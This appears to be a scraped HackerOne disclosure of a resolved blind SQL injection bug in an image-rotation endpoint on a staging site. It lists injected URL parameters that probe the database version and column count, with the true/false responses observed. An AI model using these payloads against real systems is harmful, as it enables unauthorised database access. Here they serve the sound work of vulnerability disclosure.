SQL Injection

Disclosed: 2014-11-02 19:39:08 By yappare To uzbey

Unknown

Vulnerability Details

https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=4 FALSE https://staging.uzbey.com/rotate-image?fid=2841+and+substring(version(),1,1)=5 TRUE https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+1-- TRUE https://staging.uzbey.com/rotate-image?fid=2841+and+1=1+order+by+2-- FALSE FALSE = will redirect to access denied TRUE = redirected to page not found fid must be a valid image id

Actions

View on HackerOne

Report Stats

Report ID: 23014
State: Closed
Substate: resolved
Upvotes: 2

SQL Injection

Vulnerability Details

Actions

Report Stats

Share this report